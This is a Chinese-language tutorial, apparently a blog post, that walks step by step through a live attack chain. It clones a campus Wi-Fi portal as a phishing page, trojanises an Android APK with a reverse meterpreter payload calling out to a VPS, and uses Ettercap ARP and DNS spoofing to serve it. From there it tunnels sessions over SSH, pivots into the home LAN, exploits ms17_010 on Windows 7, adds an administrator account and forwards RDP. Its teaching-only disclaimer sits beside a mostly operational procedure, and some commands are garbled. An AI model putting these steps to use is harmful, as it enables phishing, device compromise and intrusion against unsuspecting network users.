* 本文作者:求一份網絡安全實習,本文章中提及的工具和技術方法僅供安全教學用途,禁止非法使用
以前經常看我的文章的粉絲們,相信都多多少少的學到了不少東西,現在想給入門的小夥伴們提供一點微小的幫助。以前老是不知道如何在外網使用msf這個神器,自己查了查資料,總結了一點自己的認識。
0. 環境:
a) Kali 2.0 (咖啡廳:192.168.0.2/校園網:172.16.X.X)
i. Metasploit-Framework
ii. Ettercap(dns欺騙)
iii. Backdoor-apk(apk後門)
iv. Python -m SimpleHTTPServer 80 (輕量級HTTP服務器)
v. SSH Tunnel (外網打洞)
b) Vultr vps 一臺(Ubuntu 14.04)(公網IP:45.77.xx.xx)
echo GatewayPorts yes>>/etc/ssh/sshd_config
c) Android (魅藍E2 Flyme by Yunos )( 咖啡廳:192.168.0.3/家庭局域網:192.168.0.3)
d) Win7 x64 sp1(ms17_010)(家庭局域網:192.168.0.5)
示意圖:
1. 構造釣魚頁面
a) 首先我們在電腦上登錄CMCC-EDU
b) 彈出一個頁面
c) 這個頁面會提示下載一個 免費上網1.pak .我們正好用它來製作後門
d保存該頁面到桌面, 將 免費上網.html 重命名為 index.html 並放到 免費上網_files 文件夾中,然後修改HTML:,
替換頁面所有apk地址為免費上網.apk,並添加<iframe src=”免費上網.apk”>
e) python -m SimpleHTTPServer 80 #(在index.html所在文件夾直接啟動HTTP服務)
2. 使用backdoor-apk製作apk後門
a) 現在我們git clone https://github.com/dana-at-cp/backdoor-apk.git
b)cd backdoor-apk-master/backdoor-apk
c) 將 免費上網1.apk 複製到此目錄 並且重命名為 mfsw.apk
d).
/backdoor-apk.sh mfsw.apk
e) payload 選擇 3
f) lhost 填寫 vps 的IP地址 45.77.XX.XX
g) lport填寫 99 (vultr 會封掉一部分端口,比如默認的4444)
h) 然後進入 original/dist 複製mfsw.apk 到 免費上網_files 那個包含我們釣魚文件的文件夾,改名為 免費上網.apk
3. Ettercap 實現 DNS 欺騙
a) 查看ifconfig
b)
gedit /etc/ettercap/etter.dns
* A 192.168.0.2
* PTR 192.168.0.2
c) 開啟ettercap-gui 選擇wlan0
e) 選擇誘導 192.169.0.1 和 192.169.0.3 (Android)
f) 開啟Arpspoof
g) 加載dns sproof 模塊
h) 手機上如圖:
4. msf 通過SSHtunnel 接收 反彈meterpreter 會話
a) 下面我們切換kali連接到其他wifi,
ifconfig 查看一下當前kali ip
現在的地址為 172.16.8.181 ,大家等下還是能接收到來自Android的會話
b)
vi sshTunnel
c)
#!/bin/bashif [ -n “$1” ]#判斷參數$1是否為空then echo 0.0.0.0 $1”--<>--”45.77.xx.xx:$1ssh -C -g [email protected] -R $1:127.0.0.1:$1#這裡是相同端口是因為,msf監聽不到45.77.xx.xx:$1 會自動監聽0.0.0.0:$1,剛好能正常接收會話elseecho0.0.0.099”--<>--”45.77.xx.xx99 ssh -C -g [email protected] -R 99:127.0.0.1:99#默認監聽99端口 fi
d) chmod +x sshTunnel
e) ./sshTunnel #默認99端口,運行sshtunnel 來實現 vps:99 到 127.0.0.1:99的轉發
f) 其實這裡已經有會話反彈過來了,只是本地msf監聽沒有開啟
g) 現在我們開啟msf監聽
cd backdoor-apk/backdoor-apk/ msfconsole -r backdoor-apk. rc
h) 可以看到會話已經建立
i) session #查看
j) wakelock #保持喚醒防止掉線
k) session -i 1 #切換到meterpreter
l) 截個圖錄個音啥的都不是事,能中招的用戶肯定會給權限的,畢竟不是所有人都是有安全意識
m) ifconfig#查看Android的網段
n)
run autoroute -s 192.168.0.3 #添加自動路由background#返回msfconsole
o) 現在msf已經獲得192.168.0.0/24網段的權限
但是我們還是有訪問該網段的權限,掃描一手ms17_010
p) 既然是有ms17_010那就好辦了(為了方便以後控制,加上bind_tcp正向連接成功率會低一點,所以使用reverse_tcp)
q) sshtunnel 打洞,45.77.xx.136:88->127.0.0.1:88
s) 這裡win7 x64會重啟,然後獲得會話,可以看到win7的會話也被vps轉發回來了
輸入shell,進行添加用戶,這裡也可以用 run getgui -e -u admin -p 123
v) 下面我們可以使用
protfwd add -l 1234 -r 192.168.0.5 -p 3389
將win7的遠程桌面轉發到本地1234端口
w) get it!